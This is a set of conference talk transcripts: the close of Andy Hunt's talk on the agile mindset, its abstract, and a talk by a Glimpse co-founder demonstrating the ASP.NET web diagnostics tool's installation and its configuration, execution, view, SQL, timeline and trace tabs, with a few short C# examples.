All right. I know nothing. I don't even know the name of it yet, right? This is T0. I got nothing. When do you know the most about a project, right? Once it's delivered, once the payment clears, you know, once everyone's been paid right at the very end. So, trick question, when do you want to make all your decisions? Right? And yet everyone is because of this pressure, this need for closure. Many folks, not just accountants and managers, although a lot of them suffer from this, but we do too. A lot of folks want to make the decisions up here because it's just gnawing at them that this isn't known. You have to have that closure. And of course, that's the worst time to make decisions. We want to defer every decision as long as possible. All right? What database are we going to use? I don't know. Plug it in later. Make a facade, make an interface for it. We'll figure it out later. Doesn't matter. Plug and chug. What are we going to do for this? I don't know. Make an interface for it. Plug and chug later, right? Overall, it's a better architecture, but you want to defer your decisions as long as possible. And a lot of folks are really acutely uncomfortable with that. So what can we do to get better at agile? Well, one of the problems is most people at most tasks never get beyond what we call the advanced beginner level on the Dreyfus model. You learn just enough to kind of get by and then you're stuck. You don't really grow beyond that. And the problem is down at this level, you have to function. You have to be given rules in order to function. The higher levels you have to use intuition. Down here, you've got to go by the rules. The problem there is they've shown that rules in this context reduce the team down to a novice level. So any of these like strict methodologies that say or strict process that says you have to do this and you have to do that and you have to do that, you're losing the nuances of context. You're losing the value of expertise and you're reducing the entire team to the novice level of experience. And in fact, good old Ed Katmul back at Pixar says, and I quote, I don't like hard rules at all. I think they are all bullshit. I trust Ed. He seems to be doing pretty well for himself these days. And again, you know, it's not about the rules. It's not about the practices. It's about, it's not even well how well you do them. It's about this agile mindset. It's about getting feedback, making adjustments and collaborating. Now, to be able to do that, you have to have this kind of must list here. You've got to have all of your development and management practices generate continuous, meaningful feedback, whether it's coding a meeting, acceptance testing, rolling out to users, everything you do, you've got to say, what's the feedback we're going to get from that? And how are we going to analyze that? If you don't know how to get that, don't do the activity yet. You're not ready. You need to be able to evaluate the feedback in context. This is one of the problems I have with things like like TSP and PSP where they're very metric heavy and you're going to measure every little thing I do. Again, you're going to reward what you're measuring. That may or may not be what you really want to do. You're losing context. You need to be able to change whatever needs changing. Your code, your team, your interface, the rest of the organization to respond to it. If you can't do these things, I would suggest trying an agile approach. Do some agile practices. 
You'll get some value out of it, but you ain't going to be agile. And then when all else fails, and this happens, you know, after every one of these kinds of things, people say, okay, I've got this situation. How do I handle this in an agile manner? That's how. Look at what you're doing and say, all right, am I focused on the process, small p, and the tools? Or am I thinking about the individuals in their interactions, that component of the process and the tooling? Or am I focused on process for processes sake, or the tool because it's a new toy? Am I focused on getting something that works out the door and into the hands of somebody who can give me feedback? If what I'm doing does not directly support that, maybe I should think twice about doing it. Am I working with the customer? Or do I have some lawyers involved negotiating contracts? That rarely works out well. Am I responding to change? Or am I setting a plan and trying to follow it? All right, if you stick to the things on the left-hand side, you can answer those questions for yourself. And that is actually the real key thing that we've been kind of missing. So two aspects to that. First of all, how do you get agility? All right, you think of these things that I just talked about, that kind of environment, the definition, manifesto values, that thrusts you towards agility. But then there's two things you got to do. First of all, you need to make mistakes. Ed says, if everyone's trying to prevent error, that screws things up. I've seen that more than a few times, yeah. The actual cycle you want to do looks more like this. Try something, do it. Fail at it. Oh yes, the F word, fail. Learn from it. Oh, that's why no one does it that way. Okay, good. I know that now. And repeat, failure is required. If you haven't tried an approach to a piece of code that has totally fallen on its face and burned up in flames, if you haven't done that three times in a given day, you're not thinking hard enough. You're just doing the first thing that comes to your mind. You need to expand more. You need to fail. You need to write stuff that breaks. It goes, oh, that turned out to be a real turkey of an idea. All right, I know better now. I'm going to try something different this time. Try fail, learn, repeat. That's close. That'll get you going. We're almost there. Now there's one big thing that's missing. The biggest single element that's been missing from, you like Nessie? Yeah, the biggest element that's been missing for the last 10, 13 years. When you do improv on stage, theater improv, what happens is you've got actors out there and there's no script. They don't know how it's going to play out. They don't know how it's going to end. Is it going to be a comedy or a tragedy? What's the topic? They don't know. This sounds a lot like a software project, really. You're out there without a script and you don't know how it's going to end. So for improv to work, you've got to agree to a couple rules up front. Otherwise, it's just going to be boring and it's not going to work. And the two rules are to agree and add. So I come out. I'm the first actor and I say, wow, here we are on the moon. And you come out as a second actor and go, yep. Okay. What? I got nothing. It just died in its sleep right there. Nothing happened. Or worse, you could say, okay, here we are on the moon. And you come out and say, no, we're not. Again, I'm stuck. I got nothing. So what you have to do is you have to agree with the premise as it's been presented so far. 
And then add something to it. Yes, here we are on the moon. And I think I just saw something move behind that rock. Okay, now we can go somewhere with it. Yes, you're right. I saw that. And I think, whatever, you add your thing. He adds his thing and off you go. And now you've got an improv performance underway. They call this the broken remote. They call this the yes and method. You agree. And then you add your piece. This is what we have been missing for the past decade. No one has added their pieces. When we did the original meeting back in 2001, there were interviews afterwards from various news outlets. And one of the sort of common questions was, what do you see happening 10, 15 years from now? Which is ironic because we're there now. So it gives you a nice chance to look back. And I can't say everyone thought this, but certainly it was a popular thought at the time that one of the things we would see as an outgrowth of the Agile Manifesto was an explosion of Agile methods. You know, everyone and their dog and their consultant and their consultant dog would come out with their own unique branded Agile method. They would adhere to the manifesto, but they add their own practices and their own unique twists on it and their own things. And that never happened. We've got extreme programming. We've got Scrum. We got a little bit of stuff from Lean thrown in the mix. There was a new practice to XP. They added planning poker. I mean, two hands. There's not a whole lot going on there. And this is what we've been missing. Folks have not necessarily been adding in their practices, their thoughts. If you're adapting to the change that's around you, that's part of it. We need to do this differently. You know, this pairing thing isn't working. This backlog idea isn't working. This other thing, in our context, in our situation, this is not working for us. All right, try something that might. And again, it's okay to fail at it the first couple of times. Well, we tried this. That didn't work either. Okay, try again. You notice on the very first slide, I think this should be the logo for the Agile movement. It was a crumpled piece of paper. We tried that idea. Didn't work. Next, let's try that. Next, we got a big thick pad. We can try a lot of ideas. We need to try more of that, I think. So, in conclusion, I love this quote that says, the real voyage of discovery is not in seeking new landscapes, but in having new eyes. And I hope over the last hour I've given you some new eyes to consider agility and software development. I am Andy Hunt. That is my Twitter handle. That is my email address. There's some books that I've written. Thank you so much for having me. In theory, we have time for questions. If you want to go get snacks, food, whatever the next round is, that's fine too. Any questions? Snacks it is. All right. Thank you all.
|
It’s been over ten years since we coined the term agile. Are you finally comfortable with being agile? If you are comfortable, then that’s too bad, because it means you’re doing it wrong. Join Andy Hunt, one of the 17 authors of the Agile Manifesto for an important look back at what it means to be agile, and how to progress from simply following agile practices to becoming a true self-directed, self-correcting agile practitioner.
|
10.5446/51542 (DOI)
|
Okay, let's get started. So everyone's here, I'm guessing, to talk about web diagnostics. Yes? Yeah, we've got one over there. Okay. I'm guessing everyone else is in the wrong room. You sure you want to be here? You sure? Like, you can still go. I won't mind. But anyway, so we're here to talk about web diagnostics. My name is Anthony van der Hoorn and I'm one of the co-founders of Glimpse. I've been a web developer now for about 12 years, going on 13 years. And as I mentioned just before, I'm currently based in Brisbane, Australia, currently relocating to the United States, as previously mentioned. Also, I happen to have the fortunate position of actually being able to work on open source as my full-time job. And I think that's pretty cool. And all of that is thanks to Redgate. And they've done a pretty good job about it too. Because I think a lot of projects you have, you know, that might be started by a company that's open source, yet Glimpse, which is what we're talking about today, actually started in the wild and a company's come forward, Redgate, and said, we want to sponsor you guys to continue building awesome products. And so I think that's pretty cool. Our objective today is to make you awesome, okay? And we're going to do this by talking about diagnostics for the web. So what is diagnostics? Okay? So today we're going to say that diagnostics is trying to get an insight into your application. So you've got a website or a web service or something like this, and you're trying to gain an understanding of how it's actually operating. Or you actually have a problem, i.e. it's not functioning the way that you expect it to. So you're trying to debug it. Okay? So that's what we mean by diagnostics. But before we go any further, how many people have actually heard of Glimpse before? Okay? So we're doing good. Of those people who have heard of Glimpse, how many people have actually used Glimpse in like development? Okay? Cool, cool, cool. Of those people, we're going to do this one more, I swear, how many people have actually used Glimpse in production? Okay? We've got one, two, maybe three? Not three? No? Okay, so for the guy who's using Glimpse in production, this is yours after the talk, okay? So we're doing good. And lastly, how many people, I told a lie, I said that was going to be the last question, but this is the last question. How many people have actually heard of HUD in the context of Glimpse? Got two people over there, three people down here. Okay? So I think you guys are in for a treat today, if I say so myself. So we're actually going to take a quick glimpse at what we're talking about to gain some context and actually have a look at what is Glimpse. So I've got my Visual Studio project here. Actually, I'm not going to do that. I'm going to go here. And we're just going to go to this website that I spun up earlier. And we're going to take a glimpse at what Glimpse is. So we're just waiting for it to load. So essentially, the vision of Glimpse was that we can get into your server, okay? But you just install DLLs and by virtue of that, we can get an understanding of what's going on in the server. We can collect all sorts of bits of information as the request executes. If we could collect all of that information and then present it to you in some way, how would you actually want to consume that information? Okay? So what we actually do is we've got this panel that shows up in the bottom of your website here. And it's all just HTML and divs and everything like this.
And we actually get all of that information from the server and display it to you here. Okay? And that's the idea being that we can actually see how your system's configured, how the request was executed, what MVC is doing if you're using ASP.NET MVC, all of that. But taking a step back for a second, we are going to get started on diving into diagnostics. So diagnostics is one of the hardest things we do. Does anyone disagree with that? Okay? No? Okay, good. We're on a roll. Debugging is twice as hard as actually writing the code in the first place. Therefore, if you write your code to the maximum of your capability, you should therefore not be capable of actually being able to debug it. Okay? Has anyone ever had that experience where they've just gone, oh my God, what's going on here? Anyone? Yep? Okay, cool, cool. So we all know what we're talking about. This is a problem. Okay? What we're seeing up here. So we're trying to fix it. Also, about 40 to 60 percent of our time is actually spent debugging and diagnosing what's actually going on with our code or our site or whatever else. This is a problem because when we switch from debugging, okay, or switch from being creative into our debugging mode, there's actually a pretty big cognitive switch to that. It's not like we can just go, you know, make that switch, you know, and expect that it's going to, you know, we're going to be able to continue what we're doing. You're actually taking a step back, reevaluating a problem that you might be having, and then at some point later, trying to get back into that creative mode. Again, this is a problem. Also, the fact that the web isn't simple. Okay? What we're dealing with here is a landscape of multiple platforms, multiple languages, tons of different frameworks and environments, and this is only becoming, this landscape is only growing and becoming more interconnected day by day. Okay? And systems logic is becoming so widespread and more loosely coupled that trying to gain an understanding of what's actually going on in your system is getting much harder to deal with. And you'll have to excuse New Zealand being cut off the edge of this slide, you know, me being Australian, you know, it's not like we don't like them or anything. So let's talk about our current approach. What are we doing? Debugging and diagnosis hasn't really changed in the last 20 years. So since development tools came around, we've pretty much always had, you know, breakpoints. We've always pretty much had log files and miscellaneous other tools. But we haven't really seen too much of a revolution in these tools. They're kind of basic the way they work. So if we have a look at breakpoints, this allows you to stop a program at a given point in your application and kind of see what's going on, what variables are set to what. We've got log files, which show us the actions that our system has taken, a lot of them usually, depending on how many logs we're putting out. We've got static analysis tools. And these can show us how our systems are actually constructed, which is really good. But at the end of the day, something is missing. Most of these tools are too low level. Also, they're extremely blunt instruments. So let's actually have a look at what this means. If we have a look at Visual Studio, how many people have ever had a problem where they've gone into their code and they've set like 20 different breakpoints trying to capture where exactly a problem hits? Anyone? Yeah, okay. So we all know what we're talking about with breakpoints.
And breakpoints are even as bad that we have conditional breakpoints. So we can actually say, only hit this breakpoint if it hits this condition. Visual Studio has got even a full panel dedicated to managing your breakpoints. That smells a bit to me and seems like there's a bit of a problem here. And don't get me wrong. I think breakpoints are great when you want to know the value of a variable or something like this. But again, pretty low level. Also, when it comes to breakpoints, how do we know where to set that breakpoint to capture where the problem is or to replicate it? Again, everyone pretty much put their hand up because it's like, I don't know where the problem is. So you're trying to put it around to be able to capture that. Log files. Again, how many times have people trod through log files trying to figure out what their system was doing? Shelf hands. So again, we all know this problem. And what we're trying to do is filter those logs down to actually try and get a sense of what's actually going on inside of our system. Again, if all you have is a log file, fantastic. But again, to me, it smells. There's a bit of a problem. Also, I think an important realization here is that the runtime is dynamic. And that the fact that the runtime is only getting more complicated and more complex. So if we take a look at, let's say, static analysis tools, they're great at being able to show you, here's how your system is architected. Here's the modules. This one's bigger than that one and whatever else. But reality is, systems are becoming more convention based every day. And actually, this picture that our static analysis tools show us isn't actually representative of what's going on during the runtime. So again, fantastic when you want to see you're new to a project, maybe you're a consultant or whatever else and you want to see how is this project structured, where's some code smells because of different patterns that are being used. But it's not actually going to tell you much about how the system is actually executing. And at the end of the day, context is king. And what I mean by that is what is the context that my request actually ran in? And when you're trying to debug something, how is it actually operating at that particular point in time? This is important stuff. And that's a problem with, let's say, breakpoints. A breakpoint can't, doesn't have any knowledge that you're using MVC. And hence, I'm going to provide you with a different experience because you're using MVC or that you're using MVC in conjunction with any framework. A log file can dump all of that out, but it can't help it make that more useful for you. So all of these sorts of things are problems. So given what we had discussed, there should be a better solution. Why isn't there a better solution? As I mentioned before, debugging hasn't really changed in 20 years. So as it turns out, this is what myself and Nick, also co-founder of Glimpse, was discussing on a subway platform one night in New York. And we were discussing why is the system like this? As it turns out, because Nick's kind of ancient, he used cold fusion back in the day. And he was talking about how in cold fusion they kind of had this dumpout that you could do that was how the system was actually executing and what it was doing and some SQL statements and stuff like that. And that then clicked. Why isn't anyone doing this? Okay? So important questions. 
So the other question we're asking ourselves was we were both working for the same company at the time and we were both responsible for training customers and educating people running workshops and stuff like this. And so the problem was I could spend a whole day trying to explain to someone how MVC works. Particularly, you know, maybe if you come from other platforms and whatever else, these convention-based systems are quite obvious. But when you've been doing web forms all your life, trying to understand the switch that is MVC is quite a steep learning curve. Okay? So how do we do this? Traditional systems are much more straightforward in how they actually execute. And that static picture is probably much more, is much closer, closely representative of what's actually happening. But these days, with our dynamic systems, they're not. Also, how, and this kind of comes back to the education, how could we generate a picture of the request that's actually happened? How could we show someone what's actually happening? And, you know, as we all know, a picture tells a thousand words. And the other problem we were trying to solve is how do you know if a framework is actually executing the way that you expect it to? So let's say you're using ASP.NET MVC, again, as a use case, and the routes are mucking up. How are you supposed to debug that today? Okay? Now, yes, there are some tools, Glimpse being one of them. But just, you know, in terms of the general problem space, how do you know? How do you know if you're using an ORM framework and you have an N plus one where you're in a loop and you're executing the same sort of query again and again and again? These are problems. But what if it's possible? What if it's possible to answer these questions and come up with an experience that addresses these problems? That's what we did with Glimpse. Okay? So jumping back to the subway platform that I mentioned before, both Nick and I walked away thinking, oh, yeah, that's a cool idea. Okay? And, you know, if history was rewritten, maybe that's where that would have stopped. But as it would happen, John Popper was running the open source fest at Mix 11, okay, over in Las Vegas. And it just happened that both Nick and I were scheduled to go. And so we thought, hey, we've got this cool idea for a project. Why don't we try and do it? Why don't we try and do it? And so between the hours of like, what was it, like 10 p.m. and 3 a.m. for a period of three weeks, we knuckled down, we pretty much wrote the first version of Glimpse. And I think we stopped coding, what, like 10 minutes before we were due to present, okay? And as fate would happen, it was something that resonated a lot with people, okay? This picture of the world that was a lot more descriptive and a lot more context-heavy, okay, than what our breakpoints and our log files give us. So what we were actually doing is trying to figure out, okay, how can we aggregate all of this data? So you've got thousands of different data points that you could possibly pick up on the server. How could you aggregate all of this data to present a picture that is actually meaningful to someone? Also, how could we bridge the client and the server? So typically we think about the client being very different from the server, but in reality, you know, a request starts on the client, has a whole bunch of things that might happen there, continues on to the server, and then carries back on to the client. They're not conceptually two totally different things.
And particularly from a debugging and diagnostics standpoint, if something goes wrong there, if your tools force you to separate there, that's a problem, okay? Because you've got to, again, a little bit of that cognitive switch that I was talking about again. But mainly the fact that they don't, those tools, usually there's gaps between them, okay? And that's where those gaps fall, that we tend to run into a lot of problems. Also, this thought about context being important, what if we could provide framework level insights? So if we knew that MVC was running, and we knew that we could actually provide you with, you know, how the execution pipeline was running, or how the routes were being executed, pretty powerful stuff. But what if we could then do that for any framework? We could then do that for Nancy FX, okay? All of a sudden, this is becoming pretty compelling, okay? And there's not too many tools out there that actually do this, okay? They actually say, here's a set of tools that are specifically designed for the frameworks that you're using. Go out and pick the ones that you want to use, okay? And that's exactly how Glimpse has done it. So let's actually have a look at a demo of what we're actually talking about here. So I'm going to run this live on this website, okay? Once I've showed you how to install it and get it running. So we can actually see some real case scenarios here. But in the meantime, what we actually have is this sample, and I'm just going to make sure that we're in the correct place. Yes, we are. And what we've done is NuGet was coming out at the exact, pretty much the exact same time that Glimpse had launched. It may have come out a month beforehand. And it solved a lot of the problems that open source projects have typically had in the .NET space about how do you discover projects, how do you simply install them and all that sort of stuff. So we've piggybacked on top of that. And all you need to do is go Manage NuGet Packages, okay? And then you come in here and you're able to see all the packages that NuGet has available to you. Normally what you'd do is you come here and you type in Glimpse and you'd be able to see the various Glimpse packages that are available. But in this case, I don't want to take a risk on the network. So I've already got these ones available to me locally. And these are the packages that, let's say, the core team of Glimpse provide out of the box or publish. And so you can decide, well, am I using ASP.NET MVC? They're further down just because of the way these are ordered. Or are we using Entity Framework or whatever else? And in this case, I'm going to say, right, I'm using Entity Framework 4.3 in this scenario. And if we actually had a look there, you'd see that it's installing the other dependencies. So the Entity Framework package depends on the ADO package, which depends on core. So this is that model that NuGet has of package dependencies. And as you can see, we've got ticks next to each of those. Next, what I'm going to do is go ahead and install Glimpse.Mvc3. Again, this is an MVC 3 sample that I happen to have open here. And it's got a dependency on Glimpse ASP.NET and it's got a dependency on core. But because we already had core, it's gone out and already managed that for us. So I can come along here, close this. Glimpse is going to give us a helpful guide to get started if we want to read through that, if that's our first time dealing with Glimpse.
But if we actually come in here, we can actually have a look in our references and we can actually see these are the DLLs that were just added to our project here. And Glimpse is able to work with these and load up the packages that you require. So from here, all we need to do, I haven't made any other changes to this sample project except put in some Ajax requests to demo some stuff later on. And all we've done is installed that. Now Glimpse is going away, or our application is going away, starting up, building all the sorts of usual stuff that happens within an application when we compile for the first time. And we're now seeing our website. Let's see if we can actually make the res a little better here just so we can fit a little on the screen. Okay, so I'll zoom in again in a sec. But essentially, this is what the website looks like. We can navigate around. We can see different albums that fall into different categories. We can even go in and add to cart some of these albums if we want to. Pretty standard sort of e-commerce setup. But what we can actually do, and I'll just make this go a bit higher again, is come in here and go to Glimpse.axd. Can everyone see that alright? Yep, cool. And as you can see, we've got this beautiful page that we're presented with that has a couple of big buttons up there that allows us to turn Glimpse on and off. And we can actually see that Glimpse is telling us, hey, look, the cookies are turned off. Now, taking a step back, how does Glimpse actually work? So before, when we installed Glimpse, we made a couple of additions to your web.config to actually register Glimpse and have it turned on within your development environment and also whatever default settings that you want. And we also registered a HTTP handler and a HTTP module. So for those who don't know, a module is something that allows us to get into the request pipeline. So detect when a request starts and detect when a request finishes. And a HTTP handler allows us to have this page. So those are the only additions that we make and they're all at a DLL level. So if you remove those DLLs or uninstall those packages, Glimpse is totally gone from your system. So how do we know when to get involved with a request? By default, we don't go in and say, let's profile all your requests. You've actually got to make an explicit decision about, okay, I want to turn Glimpse on and I want these requests that I'm making profiled. Now, how we do that is we have a cookie that Glimpse looks for on the server that says, the developer has actually told me to tell you, server, that it would like you to be turned on. And as a consequence of that cookie being there, Glimpse will turn on. Now, don't get too worried about security and stuff at that point. We'll go into that later on as there's a whole heap of other checks that happen. For instance, even if you have the cookie, you've got to be on localhost, okay, kind of like the errors page and stuff like that, if you want to see full diagnostics. And that's what comes out of the box. And we can see that just here, if we scroll down, we can see that currently we have a policy enacted that is telling us that it's not going to work remotely with this current policy. So what we actually want to do is we can come in here, turn Glimpse on, and we can see Glimpse is now turned on. We've been told. And so what we do is we come back here and we can actually see Glimpse down the bottom right hand corner of our page. And it'll stay there.
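For anyone wondering what that module and handler mechanism looks like in code, here is a minimal sketch of an HTTP module that hooks the start and end of each request. This is not Glimpse's actual implementation, the class name and the timing logic are made up for illustration, but it is the same extension point that the web.config registration wires up.

    using System;
    using System.Web;

    // A module gets called at the beginning and end of every request that
    // flows through the ASP.NET pipeline. A tool like Glimpse uses hooks of
    // this kind to start and stop collecting data for a request.
    public class RequestTimingModule : IHttpModule
    {
        public void Init(HttpApplication application)
        {
            application.BeginRequest += (sender, e) =>
            {
                // Remember when this request started.
                HttpContext.Current.Items["RequestStart"] = DateTime.UtcNow;
            };

            application.EndRequest += (sender, e) =>
            {
                var start = (DateTime)HttpContext.Current.Items["RequestStart"];
                var elapsed = DateTime.UtcNow - start;

                // A real diagnostics tool would aggregate and display this;
                // here we simply trace it out.
                System.Diagnostics.Trace.TraceInformation(
                    "Request took {0:0.0} ms", elapsed.TotalMilliseconds);
            };
        }

        public void Dispose() { }
    }

The handler half of the story is the same idea, except it owns a URL of its own (the way Glimpse.axd does) rather than observing requests to other URLs.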
I can navigate around any of these other pages and Glimpse will just stay there. It's not going away. But what I can actually do is I can come in here at any point, open Glimpse up and start seeing what went on to make this request. And what I can actually do is again navigate around and you can see that this is even happening fast enough that this panel looks as if it's just staying here. But in reality we're actually seeing different data. It just so happens that in this example where I've got the config tab that we're seeing the same configuration set up, which is what we would expect because we're hitting the same development server all the time. So what are we actually seeing here? So in front of you is obviously we're looking at the configuration tab and we're actually seeing the app settings that are in your web config. So who's ever had a problem where you might have gone from dev to staging or your test environment and all of a sudden things have stopped working and it's turned out it's because someone forgot to change an app setting or something like that. Yes, I'm sure someone has. Yes. Okay. So we all know what we're talking about. Or who's ever had the problem where a connection string might have been set to some sort of weird setting again in staging versus your development environment from what you expected and you're wanting to know how has ASP.NET MVC actually interpreted my configuration settings. So here's a great example that it's actually broken down this connection string and actually showing you this is how your connection string is actually being interpreted here. So we can actually see we've got a default lock time of 5000 milliseconds. Pretty cool stuff. We can also start seeing how is our auth set up, our role management, custom errors, any modules and handlers that the system happens to have registered, at an app settings point of view, or from a configuration point of view rather. We can also go and see what does our environment look like. So at a basic level this will tell us, you know, I'm on machine Anthony here and I've got eight processors apparently and this is when I last started and my operating system. But more interestingly, I can come in and actually see something like what the exact version of .NET that I'm actually running. Again, how many people have run across the problem where you might have deployed to staging again and you've actually got something weird going on and it turned out to be that you were missing a service pack, you know, maybe an ASP.NET 3.5 service pack. Anyone have that problem? Okay, cool. This is where the system is actually telling you and where you can go and where you can trust that this is the information that the system is actually based off. And this is where it's actually running. And we can also see that we're in debug mode at the moment. So I'm sure less people have run into this problem but I know people who have run into issues where you might have attached a remote debugger to a server and not detached properly. Okay, so your server is still in debug mode. It can be a problem. But more interestingly, I personally think, okay, is this time zone information. So again, how many people have had the problem where you might have deployed to your server and all of a sudden time seems to be going weird and it turns out that on your local box you are taking daylight savings into account. Okay, and on the remote box it's not set to take daylight savings into account. Anyone had those sorts of time zone issues?
Okay, you know what I'm talking about. We can also see here that we've got these various application assemblies listed. So it's going to tell you these are the assemblies that ASP.NET has actually detected and loaded into your system. So again, I'm sure people have run into problems where you might have thought you've deployed a DLL and think that it's actually been picked up by ASP.NET but it hasn't been. Here we can go and actually see what's actually being loaded and what versions of those DLLs have been running. I can verify exactly which version of the .NET Framework I'm actually running at the moment. I know that. I can verify that. And we can also come down here and see what other system assemblies happen to be loaded as well. So another thing we can actually do is we can come along here and have a look at the request tab. Now this request tab is telling us what was sent to the server and you might be telling me, but Anthony, I can already see this with the client side development tools or Fiddler or whatever else. This is different. Again, I'm not sure how many of you all have actually run into this use case, but if I'm here and I'm standing on the client, I send the request off. Yep, I go through Fiddler or whatever else I happen to be using. There's a lot of other things between you and the server. And as it happens, some of those things tend to play around with the request that you've actually sent. So this is telling you, from the server perspective, this is what was actually received. So you might have had some weird load balancer thing, adding on headers or redirects or whatever else. Here we can actually see this is the information that was passed to the server. And I can verify that and I know that. So taking us a step back from the more general tabs that we have, let's start talking about MVC. How many people have at least created an MVC project and have worked with one a little bit? Okay, cool. So a typical problem that we run into with ASP.NET MVC is knowing exactly how the execution pipeline was executed. And what I mean by that is when did the filters run? When did my action run? When did the filters pick back up again? And then when did any of my child actions and whatever else execute? Has anyone ever wondered exactly which order all of that stuff happens in or run into a problem where it didn't execute the way they expected? Yeah, cool. So what we actually have is this execution tab, which actually shows us this is how MVC actually executed that pipeline. So we can see the first thing it did here was actually run an authorization filter. And then the next thing it did is actually ran the executing pre-filter on our action. And we can actually see where our filters, if we had more custom filters in here, would actually execute in relation to anything else. Because these days we've got global filters that we can have, we can have controller level filters, and we can have action level filters. And all of those are just attributes. And those attributes don't get picked up by static analysis tools, or at least not in a way that's able to tell you this is exactly how this request was served. And this is really important because a lot of these filters can change depending on how your environment is set up or how the filters are registered. So we can actually see these green ones are actually when the store controller browse action ran. And I can tell you that it took 11 milliseconds, or 11.81 milliseconds, because those extra two decimal places are really important.
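The filters he is talking about are plain attributes. As a rough sketch (the names here are invented, and this is not one of Glimpse's own filters), a custom action filter looks something like the following, and it is exactly this kind of thing that shows up as an extra row on the execution tab:

    using System.Diagnostics;
    using System.Web.Mvc;

    // Runs immediately before and after any action it is applied to.
    public class StopwatchFilterAttribute : ActionFilterAttribute
    {
        public override void OnActionExecuting(ActionExecutingContext filterContext)
        {
            // Stash the stopwatch per request rather than on the attribute
            // instance, since filter attributes can be reused across requests.
            filterContext.HttpContext.Items["ActionStopwatch"] = Stopwatch.StartNew();
        }

        public override void OnActionExecuted(ActionExecutedContext filterContext)
        {
            var stopwatch = (Stopwatch)filterContext.HttpContext.Items["ActionStopwatch"];
            stopwatch.Stop();

            Trace.TraceInformation("{0} took {1} ms",
                filterContext.ActionDescriptor.ActionName,
                stopwatch.ElapsedMilliseconds);
        }
    }

It can be applied as [StopwatchFilter] on a single action or controller, or registered for every request with GlobalFilters.Filters.Add(new StopwatchFilterAttribute()) at start-up; which of those you chose is precisely the kind of detail the execution tab makes visible.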
We can also see that we hit these other child actions that helped make up the page. And we can see that they made up the majority of the time in our request. So these are the filters that are present in the system, but they don't actually do much by default. It didn't impact us in too big a way. Another one we can actually look at is the views tab. So this is telling us like for the execution tab, and where the execution tab tells us how the system executed, this is telling us how our views were resolved. So it actually turns out that it's a bit of a discovery process that MVC goes through to resolve which view should I actually use. So we can see here, to start off with, we were looking for the browse view in the store controller, and it's not a partial view. We know that up front. And at first, it looked in the view engine, the webforms view engine. And this is the cached. So I was looking the webform view engine's cache to see, do you have this result? And it said, sorry, I don't. Then it went to the razor, repeated a view engine and repeated the same question. And it said, sorry, I don't. Then it went back to the webforms view engine and actually said, do you have it at any of these locations? And again, the MVC webforms view engine is going, no, I don't. And then finally, we got to the razor view engine and it said, yes, I can answer your query. And that's where we've actually got in. And we've now know that this is exactly the view that the system worked with. And we can even tell the model types and whatever else that we were actually passed through here. Now this is really interesting because not only are we getting insights into how MVC's making its decisions and particularly if you're doing non-standard things in this area, how that's all operating. One thing this is telling us is that we've got the webforms view engine in here and MVC is actually going through and checking the webforms view engine during its resolution process. And as it turns out, this project doesn't have any webforms view pages in it. So it's never going to answer on those. Yet how MVC ships out of the box is it's going to ask that question every time. Now, yes, MVC does make some optimizations there, but we can make an optimization too in actually removing that view engine from our solution. And that's something that's pretty easy to do via code. Another really interesting tab is the SQL tab. So we can actually come in here and have a look at the SQL that actually made this page or that was actually executed to provide the data to make this page. And as it turns out, you might have seen we installed the entity framework package so you can actually see this is how we're getting into the information and I can actually see these queries. And some of the minor things that we're doing, but I still think is niceties, is by default if we were profiling this stuff, we would just see the parameter that was used. We've actually gone through after that and replaced that with the actual parameter to display here so that what you could actually do is if you wanted to come through, copy and paste that SQL query, put into SQL Server Management Studio and actually execute it. I know it's a minor thing, but it's pretty cool, I think. 
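Going back to the view engine observation for a second: the optimisation he says is easy to do via code is usually just a couple of lines at application start-up, something along these lines (assuming the project really does only contain Razor views):

    // In Global.asax.cs (types from System.Web.Mvc):
    protected void Application_Start()
    {
        // Drop every registered view engine (including the WebForms one)
        // and put back only Razor, so view resolution never has to ask an
        // engine that can't possibly answer.
        ViewEngines.Engines.Clear();
        ViewEngines.Engines.Add(new RazorViewEngine());

        // ... the rest of the usual start-up code (areas, routes, filters).
    }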
And we can actually see more formally what the values were that were actually used there, how many records were returned, how long that took, what offset that was from the beginning of the request, and we can actually see how long our connection was open for and which connections or which commands belong to which connections because a connection can have many commands. It's not a one-to-one relationship necessarily. So I can come along here and I can see connections per command and I can see, okay, I've got my first one, that's nested here, but wait, I then created another one. But it looks like I'm doing the same sort of stuff as the first connection and I come down here, oh wait, I've created another connection. So I've actually created three connections each with one command, so three commands as well, when maybe I could now go back and say I actually want to optimize this and I'd actually prefer to have one connection executing each of those commands. So this is the sort of empowerment that we're starting to give you. Now one thing you may have realized coming along here is that we're collecting some timing information as we go along. And timing information can be really powerful in terms of letting you know where you're spending your time. But it's like, well, what does 30 milliseconds or whatever else mean to me? Or where did this request actually happen? And we kind of asked ourselves the same question, so that's when Timeline was born. And what Timeline does is it actually takes all the events that were generated to make this page and put it out in a visual format that actually allows you to get some context on how your system actually ran. It's like this waterfall. And you may see some inspiration here from Chrome development tools kind of event flows. And we can actually see that here's this controller, store browse, and I can actually see, well, part of the way into that request was when the connection was actually opened and that connection had this one command. Ironically, one thing we can also show in the SQL tab, which isn't represented in this project, we can actually show you transaction boundaries as well. So if you've got explicit transactions around various commands, we can tell you this is when it was opened. You then executed these series of commands, and this is when it was closed, again, making sure that your expectations are being met. We can do that because we have that framework level context and insights. Lastly, one other interesting thing that we provide, kind of, bring to the table is this trace tab. Not quite as sexy as some of the other tabs we've looked at, but does anyone remember trace.axd from back in the day? With web forms applications, you could actually turn it on and you get a log of which control, which controls were executed and which order and whatever else that they were executed in. When we were standing on that subway platform, we were like, that was kind of cool, like, kind of sucky visual implementation, but kind of that thought that we can filter down to those exact trace statements that were used to create the page that we were actually seeing here, they were onto something with that. So we have brought that back here so that you can actually go within your system and you can actually do a diagnostics.trace and you can actually log out to this panel. So we're not asking you to do a glimpse.trace or anything like this, it's just system stuff that we can actually hook into and then show you here. 
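Concretely, nothing more exotic than the built-in tracing API is needed for statements to land on that tab. A trivial sketch (the controller and the messages are made up, not part of the sample):

    using System.Collections.Generic;
    using System.Diagnostics;
    using System.Web.Mvc;

    public class NewsController : Controller
    {
        public ActionResult Index()
        {
            Trace.TraceInformation("Fetching the latest headlines");

            var headlines = new List<string> { "Glimpse ships HUD", "NDC is on" };

            if (headlines.Count == 0)
            {
                Trace.TraceWarning("No headlines available right now");
            }

            // Returned to whatever client-side code asked for it.
            return Json(headlines, JsonRequestBehavior.AllowGet);
        }
    }

Because these are ordinary System.Diagnostics calls, they keep working with whatever trace listeners you already have configured; the tab in the diagnostics panel is simply one more consumer of them.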
